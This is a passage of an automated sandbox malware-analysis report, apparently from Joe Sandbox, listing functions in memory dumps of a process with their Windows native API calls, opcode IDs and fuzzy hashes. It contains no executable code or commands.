                                                                                                                                        • Instruction Fuzzy Hash: 2C31CEB5A01618AFCB14DF98D881EEEB7F9EF8C714F108219F919A7340D770A8518FA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E27C20 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00E27CFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                        • Instruction ID: f40d5d542a05af351e60727931ada0e3f26e56ad7682ff915f4889481f50c536
                                                                                                                                        • Opcode Fuzzy Hash: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                        • Instruction Fuzzy Hash: F931E2B5A00218AFCB14DF99D881EEFB7F9EF88314F118219F919A7241D774A8118FA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E27F00 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00E1174E,?,?,00000000,00000004,00003000,?,?,?,?,?,?,00E1174E,00E29C21,?,?), ref: 00E27FBD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                        • Opcode ID: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                        • Instruction ID: ab996f9063dc3600b7383efb8447a9beeaffb4a3513884141e75f5b66df1d22d
                                                                                                                                        • Opcode Fuzzy Hash: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                        • Instruction Fuzzy Hash: 262128B5A00659AFDB10DF98DC41EEFB7B9EF88714F008219FD09AB241D774A811CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E27D10 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                        • Instruction ID: 8484634f00c6b5a470ce5c567436f75c0e34c90750da5255270f70118759f4ab
                                                                                                                                        • Opcode Fuzzy Hash: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                        • Instruction Fuzzy Hash: FD01C471A002287FD610EAA4DC02FFB73ACDF85714F404109FA09AB181D7B079048BE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E27DA0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00E27DD7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction ID: 2ae0b74e7a498bd63a1a99803c6deb730ac6ee54aa9c87de05a8746cbb497978
                                                                                                                                        • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction Fuzzy Hash: 67E046362002247BC220AA69DC01FAB77ACEBC5760F41802AFA18AB242C670B90187E5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 55fcdb56d85eaef832583a900783710b3c66658576851d542e64db88cfcf79d8
                                                                                                                                        • Instruction ID: 88e0b0c0ddde0c969182e309736b23df845d0577f1a76238b054299e1a869bcf
                                                                                                                                        • Opcode Fuzzy Hash: 55fcdb56d85eaef832583a900783710b3c66658576851d542e64db88cfcf79d8
                                                                                                                                        • Instruction Fuzzy Hash: 41900231615844129150B59948845564005D7E0301B55C015E0424654D8B558A565361
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: be2bed741a249f13f6bd2dd9d4702ee539262b2e11f6822b355dcdcf6c2b80ad
                                                                                                                                        • Instruction ID: e3c96ca23fae8f4eedb7b48ff0e7a746163dfa444492d1c2d4890c818d1f9899
                                                                                                                                        • Opcode Fuzzy Hash: be2bed741a249f13f6bd2dd9d4702ee539262b2e11f6822b355dcdcf6c2b80ad
                                                                                                                                        • Instruction Fuzzy Hash: 1C900261611544424150B59948044166005D7E1301395C119A0554660D875989559269
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: af37e74a1d1d0110fe01f062148d4c0b7d96a036e439df4854011482d11feff3
                                                                                                                                        • Instruction ID: 1f46daf7505de90142f20b683e52439902dff71e21246c5fe43dec07a43ba417
                                                                                                                                        • Opcode Fuzzy Hash: af37e74a1d1d0110fe01f062148d4c0b7d96a036e439df4854011482d11feff3
                                                                                                                                        • Instruction Fuzzy Hash: D090023161554802D110B59945147161005C7D0201F65C415A0424668E87D68A5165A2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 3b3b09f83a104c21103159e278869fb5e5020a7514f5862c789be14ed0a1813a
                                                                                                                                        • Instruction ID: f5cbc2c80b0707212833486e8120a0b912fefb3ba5bf839ff854daaafc30638c
                                                                                                                                        • Opcode Fuzzy Hash: 3b3b09f83a104c21103159e278869fb5e5020a7514f5862c789be14ed0a1813a
                                                                                                                                        • Instruction Fuzzy Hash: 36900261212444034115B5994414626400AC7E0201B55C025E1014690EC66689916125
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: f342c4218b2add0d5fe6c2f0e085fce2d6e0d78edc992e88d1921f6a8531b805
                                                                                                                                        • Instruction ID: c2bff83d9d39aa60cd735f583eab9ab098481d07159e2e13ffb2eb417623e860
                                                                                                                                        • Opcode Fuzzy Hash: f342c4218b2add0d5fe6c2f0e085fce2d6e0d78edc992e88d1921f6a8531b805
                                                                                                                                        • Instruction Fuzzy Hash: 4B90023121548C42D150B5994404A560015C7D0305F55C015A0064794E97668E55B661
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 8a0856e0526e2bb7de607fe93b5f1a1a05d62b2742d723a48f83b1120a757499
                                                                                                                                        • Instruction ID: 8dc41777c877080a477fac40f09c831b300965e96f6b508bb2bbb23c7a22bebd
                                                                                                                                        • Opcode Fuzzy Hash: 8a0856e0526e2bb7de607fe93b5f1a1a05d62b2742d723a48f83b1120a757499
                                                                                                                                        • Instruction Fuzzy Hash: E990023121144C02D190B599440465A0005C7D1301F95C019A0025754ECB568B5977A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: d17f3ec77994904f00ac8bca3650a15fd1c12a2d3980adeff52014f3e2dd0529
                                                                                                                                        • Instruction ID: c052f88f401ae76ebc6cd050607b65fbda7d7ece45f43609e2c42082d18e0755
                                                                                                                                        • Opcode Fuzzy Hash: d17f3ec77994904f00ac8bca3650a15fd1c12a2d3980adeff52014f3e2dd0529
                                                                                                                                        • Instruction Fuzzy Hash: FE90023161544C02D160B59944147560005C7D0301F55C015A0024754E87968B5576A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: cc068bf23754a3fe41933ddd0c0731cc36edb900b06ea7b08449ee46b5915e3d
                                                                                                                                        • Instruction ID: cd2e46b81ab11ff03bbf80972b023916cb12d59d8a10d5afdf4cc6a5f339048d
                                                                                                                                        • Opcode Fuzzy Hash: cc068bf23754a3fe41933ddd0c0731cc36edb900b06ea7b08449ee46b5915e3d
                                                                                                                                        • Instruction Fuzzy Hash: 3C900225231444020155F999060451B0445D7D6351395C019F1416690DC76289655321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 9b0e182265a8cb3e35a14341c15b021b829373d87cf1b83435d1eedfbe2f2de1
                                                                                                                                        • Instruction ID: 65be07c88f82bb8900bbb522af18c26a34bb504ab879fa26d43d1755fc9931cf
                                                                                                                                        • Opcode Fuzzy Hash: 9b0e182265a8cb3e35a14341c15b021b829373d87cf1b83435d1eedfbe2f2de1
                                                                                                                                        • Instruction Fuzzy Hash: F3900435331444030115FDDD07045170047C7D5351355C035F1015750DD773CD715131
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0e4490e65941708d788ad07970c801636abebfff9396784f24651c238feb521e
                                                                                                                                        • Instruction ID: ee436b08eebd6016bc25573985b8f35b73ec3f7adf0392ea34d3256588278f8c
                                                                                                                                        • Opcode Fuzzy Hash: 0e4490e65941708d788ad07970c801636abebfff9396784f24651c238feb521e
                                                                                                                                        • Instruction Fuzzy Hash: A390022125549502D160B59D44046264005E7E0201F55C025A0814694E869689556221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: effb525cb204ab0a935260455030f48a7c2a06e8bfc40cd02136bdb212d3f773
                                                                                                                                        • Instruction ID: e8737c787ffb50c45a0b3237419c4309f60d9149092157a22314e4393f9479eb
                                                                                                                                        • Opcode Fuzzy Hash: effb525cb204ab0a935260455030f48a7c2a06e8bfc40cd02136bdb212d3f773
                                                                                                                                        • Instruction Fuzzy Hash: 1390026135144842D110B5994414B160005C7E1301F55C019E1064654E875ACD526126
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 6b345358dce7b2fce410ce534fe32263319e5783ffe48152e35ac425bb72a20f
                                                                                                                                        • Instruction ID: ba0a42f9ec3dc100031a35f688ee0b12e00bca569e7b9adea562965631d2019c
                                                                                                                                        • Opcode Fuzzy Hash: 6b345358dce7b2fce410ce534fe32263319e5783ffe48152e35ac425bb72a20f
                                                                                                                                        • Instruction Fuzzy Hash: 86900221221C4442D210B9A94C14B170005C7D0303F55C119A0154654DCA5689615521
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 41ce87d078b792679e825d62b7e9bc50d7712630ee7f2ac16af0840ba470974d
                                                                                                                                        • Instruction ID: 38a2d4948ed8e456510584d34a3761f92a1dffc6546753e4ebb8559423e0ad0f
                                                                                                                                        • Opcode Fuzzy Hash: 41ce87d078b792679e825d62b7e9bc50d7712630ee7f2ac16af0840ba470974d
                                                                                                                                        • Instruction Fuzzy Hash: 96900221611444424150B5A988449164005EBE1211755C125A0998650E869A89655665
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 3b15a843ea4c003462231c135fd87a40e32eae437fe8af526e7e2b6b95b05936
                                                                                                                                        • Instruction ID: d0262f8e328a0a9cda75998e85d44275e27c3924c0bb25c784678ff52834c676
                                                                                                                                        • Opcode Fuzzy Hash: 3b15a843ea4c003462231c135fd87a40e32eae437fe8af526e7e2b6b95b05936
                                                                                                                                        • Instruction Fuzzy Hash: 7D90026121184803D150B99948046170005C7D0302F55C015A2064655F8B6A8D516135
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 199e6015e5615fab51a2466389a31bb2c09c2cb034e01a69c24cab0ae4d57509
                                                                                                                                        • Instruction ID: 7eb444c68d091f30b7031cc9595eb9ab4bc4d362175e8a2c3d4313a094dce40a
                                                                                                                                        • Opcode Fuzzy Hash: 199e6015e5615fab51a2466389a31bb2c09c2cb034e01a69c24cab0ae4d57509
                                                                                                                                        • Instruction Fuzzy Hash: AB90022161144902D111B5994404626000AC7D0241F95C026A1024655FCB668A92A131
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
